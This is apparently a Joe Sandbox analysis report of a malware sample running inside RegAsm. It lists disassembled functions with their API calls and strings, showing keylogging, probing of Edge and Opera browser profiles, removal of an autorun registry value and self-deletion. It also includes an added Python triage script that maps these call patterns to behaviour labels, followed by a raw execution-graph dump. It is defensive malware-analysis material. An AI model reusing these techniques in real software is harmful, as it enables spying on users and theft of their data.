                                                          • Opcode ID: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                                                          • Instruction ID: 529cceb54bdbac8586af3e6ebd5273a77adcdcd577382419881006e182ae29c8
                                                          • Opcode Fuzzy Hash: d11da1c58d5dd2ef9da09c3ea68de0927d50847f2cce6e72d2cc7c3e9ccd8b86
                                                          • Instruction Fuzzy Hash: 96F05E31A00219A6C604BBF69C478BF7B3C9D50709B50017FBA01B61D3EE789945C6EE
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C559
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: UserProfile$\AppData\Local\Microsoft\Edge\
                                                          • API String ID: 1174141254-2800177040
                                                          • Opcode ID: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                                                          • Instruction ID: 330371ab8f71d6844e3501a7b0875f3b866c8fe31c1dcac5d822fe972055fe7f
                                                          • Opcode Fuzzy Hash: 62d77e7710f88fd67431bbf20b3e0d601dfd53fd2a54c8c31c6ded84776c1d6f
                                                          • Instruction Fuzzy Hash: ECF05E31A00219A6CA14B7B69C47CEF7B6C9D50705B10017FB602B61D2EE78994186EE
                                                          APIs
                                                          • PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExistsFilePath
                                                          • String ID: AppData$\Opera Software\Opera Stable\
                                                          • API String ID: 1174141254-1629609700
                                                          • Opcode ID: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                                                          • Instruction ID: 49b076bb86b4c8db4da1bdedad10e463925805c403c57d636a3174f469f12df7
                                                          • Opcode Fuzzy Hash: cbec4c721474318851a7c02d4d9936ce5133d15acec931d959add52bdfa17e90
                                                          • Instruction Fuzzy Hash: 13F05E31A00319A6CA14B7B69C47CEF7B7C9D10709B40017BB601B61D2EE789D4586EA
                                                          APIs
                                                          • GetKeyState.USER32(00000011), ref: 0040B64B
                                                            • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
                                                            • Part of subcall function 0040A3E0: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                                            • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                                            • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
                                                            • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
                                                            • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                                            • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                                            • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,?,0040B82F,?,?,?,?,?,00000000), ref: 0040A662
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                          • String ID: [AltL]$[AltR]
                                                          • API String ID: 2738857842-2658077756
                                                          • Opcode ID: b99914e28c38a6df7d0c4dd8e7e2660e658301fcb38244262cae42baa40b951a
                                                          • Instruction ID: e48b288e44f9d4c6b211653e2fe3bcc76c2b66b59b43e84e4aaf588e4500f4a3
                                                          • Opcode Fuzzy Hash: b99914e28c38a6df7d0c4dd8e7e2660e658301fcb38244262cae42baa40b951a
                                                          • Instruction Fuzzy Hash: 3BE0652134021052C828323E592F6BE2D51C742754B86057FF9826B6C5DABF4D1542CF
                                                          APIs
                                                          • GetOEMCP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED17
                                                          • GetACP.KERNEL32(00000000,?,?,0044EF75,?), ref: 0044ED2E
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: uD
                                                          • API String ID: 0-2547262877
                                                          • Opcode ID: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                          • Instruction ID: 19c10458df6b4aed5d20bc802b22671fd2b069e30d3a1616a3713fc20edc201d
                                                          • Opcode Fuzzy Hash: c5b08800a69d4838b4f5beafbc063674321feb547ffb76a205f46ddd03b66443
                                                          • Instruction Fuzzy Hash: A5F0C871800105CBEB20DB55DC897697771BF11335F144755E4394A6E2C7B98C81CF49
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExecuteShell
                                                          • String ID: !D@$open
                                                          • API String ID: 587946157-1586967515
                                                          • Opcode ID: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                          • Instruction ID: 73504a7432a82bf20c2cd712858cac99996ed9f8eaf32da6c0f13d1c3fa6c831
                                                          • Opcode Fuzzy Hash: 204c713d203efeff6b41638de090f7ddfc4dbb766d4a3fc6f87e83cad3270c1f
                                                          • Instruction Fuzzy Hash: 2FE0ED712483059AD614EA72DC91AFE7358AB54755F40083FF506514E2EE3C5849C65A
                                                          APIs
                                                          • GetKeyState.USER32(00000012), ref: 0040B6A5
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State
                                                          • String ID: [CtrlL]$[CtrlR]
                                                          • API String ID: 1649606143-2446555240
                                                          • Opcode ID: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
                                                          • Instruction ID: bec5627f59812d2efb235ad4bfa8f6d19d2d97b3e0140e65676d9d4505e8418d
                                                          • Opcode Fuzzy Hash: 5066be23c52cfaa6c6245271f0373fbb1ceb4cf0ed24aba14fe9ece54d79b194
                                                          • Instruction Fuzzy Hash: 6FE04F2160021052C524363D5A1E67D2911CB52754B42096FF882A76CADEBF891543CF
                                                          APIs
                                                            • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                                          • __Init_thread_footer.LIBCMT ref: 00410F29
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Init_thread_footer__onexit
                                                          • String ID: ,kG$0kG
                                                          • API String ID: 1881088180-2015055088
                                                          • Opcode ID: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                          • Instruction ID: c595ded0a674a2b9ccc74dbc71d20adb946c68f5a758ea4f5ad5526f3cc50642
                                                          • Opcode Fuzzy Hash: 3543072a86426642cb3d95922a277c4e502be0bac8cf48ffd361c80e3a631357
                                                          • Instruction Fuzzy Hash: 35E0D8312149208EC214A32995829C93791DB4E335B61412BF414D72D5CBAEB8C1CA1D
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
                                                          • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A2F
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 2654517830-1051519024
                                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                          • Instruction ID: 6fb421a43559def270d35797bbb86f7c8bc210cd52a17bc53693ea6618a40a87
                                                          • Opcode Fuzzy Hash: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                                          • Instruction Fuzzy Hash: 99E0C23124420CFBDF104F71DD06FFA376CDB01F42F1006A5BA0692091C626DF049668
                                                          APIs
                                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
                                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteDirectoryFileRemove
                                                          • String ID: pth_unenc
                                                          • API String ID: 3325800564-4028850238
                                                          • Opcode ID: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                          • Instruction ID: 8281cfb8de641f04b50c20d0c8e921e0d4b8d2282f61a3be21f0805504db5409
                                                          • Opcode Fuzzy Hash: f0c530d5f410f6e48232dff94e8b4526202df80a5f9212f67769b953604160dd
                                                          • Instruction Fuzzy Hash: 45E046321007119BCB14AB258C48AD6339CAF0031AF00486FA492A32A1DF38AC09CAA8
                                                          APIs
                                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                                                          Strings
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ObjectProcessSingleTerminateWait
                                                          • String ID: pth_unenc
                                                          • API String ID: 1872346434-4028850238
                                                          • Opcode ID: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                          • Instruction ID: 1c2a9d3d993a2aa40768a62e13ec0bdc830226799852dc8a6b6faba0c59f1205
                                                          • Opcode Fuzzy Hash: 1b0d5640518fcde21729cf1b02f36aec3fd37732ecf9f275e44c4103a8157302
                                                          • Instruction Fuzzy Hash: 2FD01234189312FFD7350F60EE4DB043B98A705362F140265F428512F1C7A58994EA59
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401D55), ref: 00440D27
                                                          • GetLastError.KERNEL32 ref: 00440D35
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440D90
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                          • String ID:
                                                          • API String ID: 1717984340-0
                                                          • Opcode ID: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                          • Instruction ID: f204e272a103731937cf510deb2d9f687334ef06d731906aa630a644c7418207
                                                          • Opcode Fuzzy Hash: 06151d672a34678faa0f1c8d5979b725e0733317c82078799b35041d461e39d5
                                                          • Instruction Fuzzy Hash: BA411871A00206EFEF218FA5C8447AB7BA5EF45310F10816BFA549B3A1DB38AD25C759
                                                          APIs
                                                          • IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000001,?,?,?,00411EF0), ref: 00411B8C
                                                          • IsBadReadPtr.KERNEL32(?,00000014,00411EF0), ref: 00411C58
                                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C7A
                                                          • SetLastError.KERNEL32(0000007E,00411EF0), ref: 00411C91
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLastRead
                                                          • String ID:
                                                          • API String ID: 4100373531-0
                                                          • Opcode ID: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                          • Instruction ID: 277f4bdee2933866d2d1c697a3b04f0a6a13197b354a533a519a822f1f8833ca
                                                          • Opcode Fuzzy Hash: 46f42941f51e653cdae40cd00269a703bf4e12df5cc4a1911c605fdb7767d4e6
                                                          • Instruction Fuzzy Hash: 37419C75244305DFE7248F18DC84BA7B3E8FB48711F00082EEA8A87661F739E845CB99
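The API blocks above list, per function in the RegAsm memory dump, the imports the emulator reached together with the argument values it observed. Two of those values are worth decoding by hand: the first argument of RegOpenKeyExW, 80000002, is HKEY_LOCAL_MACHINE, so the RegDeleteValueW that follows removes a value under HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run, an autorun location that simple Run-key checks often skip; and the GetKeyState arguments 10, 11 and 12 are VK_SHIFT, VK_CONTROL and VK_MENU (Alt), which fits the [CtrlL]/[CtrlR] and [AltL]/[AltR] strings of the keylogging functions. The following is an added example, not part of the Joe Sandbox report or of any tool it uses: it parses bullet lines in exactly the shape shown above and maps API combinations and argument substrings to behaviour labels. The behaviour rules and their names are this example's own heuristics, the VK and hive tables are Win32 constants, and the embedded excerpt is copied from the blocks above.

```python
"""Triage helper: parse the bullet lines of a Joe Sandbox "APIs" block and
map API combinations to behaviour labels.

Added example for this report page; it is not Joe Sandbox code.  RULES and
the label names are this example's own heuristics; VK_NAMES and HIVES are
Win32 constants; REPORT_EXCERPT is copied from the function blocks on the page.
"""
import re

# One bullet line of an "APIs" block, in the two shapes the report uses:
#   • GetKeyState.USER32(00000011), ref: 0040B64B
#   • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants (not taken from the report).
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU"}
HIVES = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}

# Behaviour rules (this example's heuristics): every API in the set must be
# present and, where a needle is given, some argument must contain it.
RULES = [
    ("keylogger", {"GetKeyState", "GetKeyboardState", "ToUnicodeEx", "GetForegroundWindow"}, None),
    ("autorun_value_removed", {"RegOpenKeyExW", "RegDeleteValueW"}, r"Policies\Explorer\Run"),
    ("self_delete", {"DeleteFileW", "RemoveDirectoryW"}, None),
    ("browser_profile_probe", {"PathFileExistsW"}, "Opera Stable"),
    ("launch_via_shell", {"ShellExecuteW"}, "open"),
]

# API lines copied from the function blocks above (13 calls in total).
REPORT_EXCERPT = r"""
• PathFileExistsW.SHLWAPI(00000000,\Opera Software\Opera Stable\,00000000), ref: 0040C5BC
• GetKeyState.USER32(00000011), ref: 0040B64B
  • Part of subcall function 0040A3E0: GetForegroundWindow.USER32 ref: 0040A416
  • Part of subcall function 0040A3E0: GetKeyboardLayout.USER32(00000000), ref: 0040A429
  • Part of subcall function 0040A3E0: GetKeyState.USER32(00000010), ref: 0040A433
  • Part of subcall function 0040A3E0: GetKeyboardState.USER32(?), ref: 0040A43E
  • Part of subcall function 0040A3E0: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
• GetKeyState.USER32(00000012), ref: 0040B6A5
• ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161A8
• RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D144,00000000,004752D8,004752F0,?,pth_unenc), ref: 00413A31
• RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A45
• DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B876
• RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8A1
"""


def parse_api_lines(text):
    """Return one dict per API call line; lines that are not API calls are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        calls.append({
            "api": m["api"],
            "module": m["mod"],
            "args": m["args"].split(",") if m["args"] else [],
            "ref": int(m["ref"], 16),
            "subcall": int(m["sub"], 16) if m["sub"] else None,
        })
    return calls


def classify(calls):
    """Names of the RULES satisfied by the parsed calls, in rule order."""
    apis = {c["api"] for c in calls}
    args = [a for c in calls for a in c["args"]]
    return [name for name, needs, needle in RULES
            if needs <= apis and (needle is None or any(needle in a for a in args))]


def modifier_keys_polled(calls):
    """Virtual-key codes passed to GetKeyState, decoded where the code is known."""
    keys = set()
    for c in calls:
        if c["api"] == "GetKeyState" and c["args"] and c["args"][0] != "?":
            code = int(c["args"][0], 16)
            keys.add(VK_NAMES.get(code, "VK_%02X" % code))
    return sorted(keys)


def registry_keys_opened(calls):
    """(hive, subkey) pairs from RegOpenKeyExW / RegCreateKeyExW calls."""
    out = []
    for c in calls:
        if c["api"] in ("RegOpenKeyExW", "RegCreateKeyExW") and len(c["args"]) >= 2:
            out.append((HIVES.get(c["args"][0], c["args"][0]), c["args"][1]))
    return out


def summarize(text):
    """Parse a block of API lines and return the triage summary as a dict."""
    calls = parse_api_lines(text)
    return {
        "calls": len(calls),
        "behaviours": classify(calls),
        "modifier_keys": modifier_keys_polled(calls),
        "registry_keys": registry_keys_opened(calls),
    }


if __name__ == "__main__":
    for key, value in summarize(REPORT_EXCERPT).items():
        print(key, value)
```

Feeding the script a whole page of blocks rather than one excerpt works the same way, since non-matching lines are ignored; the rules are deliberately conservative (all APIs of a set must co-occur), so a hit is a pointer to the function to inspect, not a verdict on its own.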

                                                          Execution Graph

                                                          Execution Coverage:6.5%
                                                          Dynamic/Decrypted Code Coverage:9.1%
                                                          Signature Coverage:0.8%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:67
execution_graph: rendered on the page as an interactive node/edge graph (2000 nodes, 67 limit nodes) whose node listing does not survive as text. API-bearing nodes in the listed part of the graph, by address:
• 4466f4 -> CRT start-up at 446700/4467bd (GetModuleHandleA, __set_app_type, __p__fmode, __p__commode, __setusermatherr, _controlfp, _initterm, __wgetmainargs, GetStartupInfoW) -> 41276d (main) -> 446896 exit, 44689d _cexit
• 41276d: 4044a4 LoadLibraryW, 4044cf GetProcAddress, 4044e8 FreeLibrary, 404507 MessageBoxW; 414b81 -> 40a804 memset, GetSystemDirectoryW, wcscpy -> 409719 wcslen, wcscat, LoadLibraryW -> 414b9e GetProcAddress; 412794 SetErrorMode, GetModuleHandleW, EnumResourceTypesW; 412863 CoInitialize; 4123e2 GetModuleHandleW, RegisterClassW, CreateWindowExW; 412873 ShowWindow, UpdateWindow, LoadAcceleratorsW, GetMessageW, followed by the message loop at 4128d0-412941 (TranslateAcceleratorW, IsDialogMessageW, TranslateMessage, DispatchMessageW)
• INI/config handling: 409bca GetModuleFileNameW; 40d6f5 and 40d76e GetPrivateProfileStringW, WritePrivateProfileStringW (_itow); 40daef GetPrivateProfileIntW; 40d65d GetPrivateProfileStringW; 409b98 GetFileAttributesW; 40dc9c EnumResourceNamesW; 40da80 LoadStringW; 4447d9 _snwprintf
• Resource loading at 40b58d: GetModuleHandleW, FindResourceW, LoadResource, SizeofResource, LockResource, then memcpy at 40b608 and 40b4d3 (reached from 402afb through 40b2cc, 27 API calls)
• 411ac5: 414770 wcscpy, CloseHandle; 4018db GetWindowPlacement, GetSystemMetrics, SetWindowPlacement; 40ea13 SendMessageW
• 4110dc: 40969c LoadCursorW, SetCursor; 4110f7 _wcsicmp; 4111a6 qsort; 4033a9 memset, memcpy; 4033ec wcscmp
• also: 401134 GetModuleHandleW, LoadIconW; 409cdb CreateFontIndirectW; 4125e6 and 444728 DeleteObject; 4152c6 malloc; 40a93e memcpy
38949->38950 38951 40333c 38949->38951 38950->38951 38951->38944 38951->38949 38951->38950 39153 4028e7 11 API calls 38951->39153 39154 40f508 6 API calls 38951->39154 38954 403421 _wcsicmp 38954->38951 38956 444a64 FreeLibrary 38955->38956 38957 444a83 38955->38957 38956->38957 38957->38803 38958->38804 38960 445548 38959->38960 38961 445599 38960->38961 39156 40c768 38960->39156 38962 4455a8 memset 38961->38962 38970 4457f2 38961->38970 39239 403988 38962->39239 38968 4455e5 38983 445672 38968->38983 38988 44560f 38968->38988 38973 445854 38970->38973 39341 403e2d memset memset memset memset memset 38970->39341 38971 4458bb memset memset 38975 414c2e 15 API calls 38971->38975 39016 4458aa 38973->39016 39364 403c9c memset memset memset memset memset 38973->39364 38974 44595e memset memset 38978 414c2e 15 API calls 38974->38978 38979 4458f9 38975->38979 38977 445a00 memset memset 39387 414c2e 38977->39387 38986 44599c 38978->38986 38987 40b2cc 27 API calls 38979->38987 39250 403fbe memset memset memset memset memset 38983->39250 38995 40b2cc 27 API calls 38986->38995 38996 445909 38987->38996 38998 4087b3 337 API calls 38988->38998 38989 445bca 38997 445c8b memset memset 38989->38997 39052 445cf0 38989->39052 38990 445b38 memset memset memset 39000 445bd4 38990->39000 39001 445b98 38990->39001 38991 445849 39451 40b1ab ??3@YAXPAX ??3@YAXPAX 38991->39451 39010 4459ac 38995->39010 39007 409d1f 6 API calls 38996->39007 39011 414c2e 15 API calls 38997->39011 39008 445621 38998->39008 38999 44589f 39452 40b1ab ??3@YAXPAX ??3@YAXPAX 38999->39452 39005 414c2e 15 API calls 39000->39005 39001->39000 39013 445ba2 39001->39013 39003 40b2cc 27 API calls 39015 445a4f 39003->39015 39018 445be2 39005->39018 39006 403335 39152 4452e5 45 API calls 39006->39152 39021 445919 39007->39021 39437 4454bf 20 API calls 39008->39437 39009 445823 39009->38991 39030 4087b3 337 API calls 39009->39030 39022 409d1f 6 API calls 39010->39022 39023 445cc9 39011->39023 39522 4099c6 wcslen 
39013->39522 39402 409d1f wcslen wcslen 39015->39402 39016->38971 39049 44594a 39016->39049 39028 40b2cc 27 API calls 39018->39028 39019 445d3d 39048 40b2cc 27 API calls 39019->39048 39020 445d88 memset memset memset 39031 414c2e 15 API calls 39020->39031 39453 409b98 GetFileAttributesW 39021->39453 39032 4459bc 39022->39032 39033 409d1f 6 API calls 39023->39033 39024 445879 39024->38999 39035 4087b3 337 API calls 39024->39035 39025 445bb3 39525 445403 memset 39025->39525 39038 445bf3 39028->39038 39030->39009 39041 445dde 39031->39041 39518 409b98 GetFileAttributesW 39032->39518 39034 445ce1 39033->39034 39542 409b98 GetFileAttributesW 39034->39542 39035->39024 39047 409d1f 6 API calls 39038->39047 39039 445928 39039->39049 39454 40b6ef 39039->39454 39050 40b2cc 27 API calls 39041->39050 39046 40b2cc 27 API calls 39054 445a94 39046->39054 39056 445c07 39047->39056 39057 445d54 _wcsicmp 39048->39057 39049->38974 39061 4459ed 39049->39061 39060 445def 39050->39060 39051 4459cb 39051->39061 39068 40b6ef 249 API calls 39051->39068 39052->39006 39052->39019 39052->39020 39053 445389 255 API calls 39053->38989 39407 40ae18 39054->39407 39055 44566d 39055->38970 39324 413d4c 39055->39324 39064 445389 255 API calls 39056->39064 39065 445d71 39057->39065 39129 445d67 39057->39129 39059 445665 39438 40b1ab ??3@YAXPAX ??3@YAXPAX 39059->39438 39066 409d1f 6 API calls 39060->39066 39061->38977 39103 445b22 39061->39103 39070 445c17 39064->39070 39543 445093 23 API calls 39065->39543 39073 445e03 39066->39073 39068->39061 39069 4456d8 39075 40b2cc 27 API calls 39069->39075 39076 40b2cc 27 API calls 39070->39076 39072 44563c 39072->39059 39078 4087b3 337 API calls 39072->39078 39544 409b98 GetFileAttributesW 39073->39544 39074 40b6ef 249 API calls 39074->39006 39080 4456e2 39075->39080 39081 445c23 39076->39081 39077 445d83 39077->39006 39078->39072 39440 413fa6 _wcsicmp _wcsicmp 39080->39440 39085 409d1f 6 API calls 39081->39085 39083 445e12 39090 445e6b 39083->39090 39097 
40b2cc 27 API calls 39083->39097 39088 445c37 39085->39088 39086 445aa1 39089 445b17 39086->39089 39106 445ab2 memset 39086->39106 39120 409d1f 6 API calls 39086->39120 39414 40add4 39086->39414 39419 445389 39086->39419 39428 40ae51 39086->39428 39087 4456eb 39093 4456fd memset memset memset memset 39087->39093 39094 4457ea 39087->39094 39095 445389 255 API calls 39088->39095 39519 40aebe 39089->39519 39546 445093 23 API calls 39090->39546 39441 409c70 wcscpy wcsrchr 39093->39441 39444 413d29 39094->39444 39102 445c47 39095->39102 39098 445e33 39097->39098 39104 409d1f 6 API calls 39098->39104 39100 445e7e 39105 445f67 39100->39105 39108 40b2cc 27 API calls 39102->39108 39103->38989 39103->38990 39109 445e47 39104->39109 39110 40b2cc 27 API calls 39105->39110 39111 40b2cc 27 API calls 39106->39111 39113 445c53 39108->39113 39545 409b98 GetFileAttributesW 39109->39545 39115 445f73 39110->39115 39111->39086 39112 409c70 2 API calls 39116 44577e 39112->39116 39117 409d1f 6 API calls 39113->39117 39119 409d1f 6 API calls 39115->39119 39121 409c70 2 API calls 39116->39121 39122 445c67 39117->39122 39118 445e56 39118->39090 39126 445e83 memset 39118->39126 39123 445f87 39119->39123 39120->39086 39125 445389 255 API calls 39122->39125 39549 409b98 GetFileAttributesW 39123->39549 39125->38989 39130 40b2cc 27 API calls 39126->39130 39129->39006 39129->39074 39132 445eab 39130->39132 39134 409d1f 6 API calls 39132->39134 39136 445ebf 39134->39136 39138 40ae18 9 API calls 39136->39138 39148 445ef5 39138->39148 39142 40ae51 9 API calls 39142->39148 39143 445f5c 39144 40aebe FindClose 39143->39144 39144->39105 39145 40add4 2 API calls 39145->39148 39146 40b2cc 27 API calls 39146->39148 39147 409d1f 6 API calls 39147->39148 39148->39142 39148->39143 39148->39145 39148->39146 39148->39147 39150 445f3a 39148->39150 39547 409b98 GetFileAttributesW 39148->39547 39548 445093 23 API calls 39150->39548 39152->38951 39153->38954 39154->38951 39155->38946 39157 40c775 39156->39157 39550 
40b1ab ??3@YAXPAX ??3@YAXPAX 39157->39550 39159 40c788 39551 40b1ab ??3@YAXPAX ??3@YAXPAX 39159->39551 39161 40c790 39552 40b1ab ??3@YAXPAX ??3@YAXPAX 39161->39552 39163 40c798 39164 40aa04 ??3@YAXPAX 39163->39164 39165 40c7a0 39164->39165 39553 40c274 memset 39165->39553 39170 40a8ab 9 API calls 39171 40c7c3 39170->39171 39172 40a8ab 9 API calls 39171->39172 39173 40c7d0 39172->39173 39582 40c3c3 39173->39582 39177 40c7e5 39178 40c877 39177->39178 39179 40c86c 39177->39179 39185 40c634 49 API calls 39177->39185 39607 40a706 39177->39607 39186 40bdb0 39178->39186 39624 4053fe 39 API calls 39179->39624 39185->39177 39814 404363 39186->39814 39240 40399d 39239->39240 39880 403a16 39240->39880 39242 403a09 39894 40b1ab ??3@YAXPAX ??3@YAXPAX 39242->39894 39244 403a12 wcsrchr 39244->38968 39245 4039a3 39245->39242 39248 4039f4 39245->39248 39891 40a02c CreateFileW 39245->39891 39248->39242 39249 4099c6 2 API calls 39248->39249 39249->39242 39251 414c2e 15 API calls 39250->39251 39252 404048 39251->39252 39253 414c2e 15 API calls 39252->39253 39254 404056 39253->39254 39255 409d1f 6 API calls 39254->39255 39256 404073 39255->39256 39257 409d1f 6 API calls 39256->39257 39258 40408e 39257->39258 39259 409d1f 6 API calls 39258->39259 39260 4040a6 39259->39260 39261 403af5 20 API calls 39260->39261 39262 4040ba 39261->39262 39263 403af5 20 API calls 39262->39263 39264 4040cb 39263->39264 39921 40414f memset 39264->39921 39266 4040e0 39267 404140 39266->39267 39269 4040ec memset 39266->39269 39271 4099c6 2 API calls 39266->39271 39272 40a8ab 9 API calls 39266->39272 39935 40b1ab ??3@YAXPAX ??3@YAXPAX 39267->39935 39269->39266 39271->39266 39272->39266 39325 40b633 ??3@YAXPAX 39324->39325 39326 413d65 CreateToolhelp32Snapshot memset Process32FirstW 39325->39326 39327 413f00 Process32NextW 39326->39327 39328 413da5 OpenProcess 39327->39328 39329 413f17 CloseHandle 39327->39329 39330 413df3 memset 39328->39330 39333 413eb0 39328->39333 39329->39069 40187 413f27 39330->40187 
39332 413ebf ??3@YAXPAX 39332->39333 39333->39327 39333->39332 39334 4099f4 3 API calls 39333->39334 39334->39333 39335 413e37 GetModuleHandleW 39337 413e46 GetProcAddress 39335->39337 39338 413e1f 39335->39338 39337->39338 39338->39335 40192 413959 39338->40192 40208 413ca4 39338->40208 39340 413ea2 CloseHandle 39340->39333 39342 414c2e 15 API calls 39341->39342 39343 403eb7 39342->39343 39344 414c2e 15 API calls 39343->39344 39345 403ec5 39344->39345 39346 409d1f 6 API calls 39345->39346 39347 403ee2 39346->39347 39348 409d1f 6 API calls 39347->39348 39349 403efd 39348->39349 39350 409d1f 6 API calls 39349->39350 39351 403f15 39350->39351 39352 403af5 20 API calls 39351->39352 39353 403f29 39352->39353 39354 403af5 20 API calls 39353->39354 39355 403f3a 39354->39355 39356 40414f 33 API calls 39355->39356 39357 403f4f 39356->39357 39358 403faf 39357->39358 39360 403f5b memset 39357->39360 39362 4099c6 2 API calls 39357->39362 39363 40a8ab 9 API calls 39357->39363 40222 40b1ab ??3@YAXPAX ??3@YAXPAX 39358->40222 39360->39357 39361 403fb7 39361->39009 39362->39357 39363->39357 39365 414c2e 15 API calls 39364->39365 39366 403d26 39365->39366 39367 414c2e 15 API calls 39366->39367 39368 403d34 39367->39368 39369 409d1f 6 API calls 39368->39369 39370 403d51 39369->39370 39371 409d1f 6 API calls 39370->39371 39372 403d6c 39371->39372 39373 409d1f 6 API calls 39372->39373 39374 403d84 39373->39374 39375 403af5 20 API calls 39374->39375 39376 403d98 39375->39376 39377 403af5 20 API 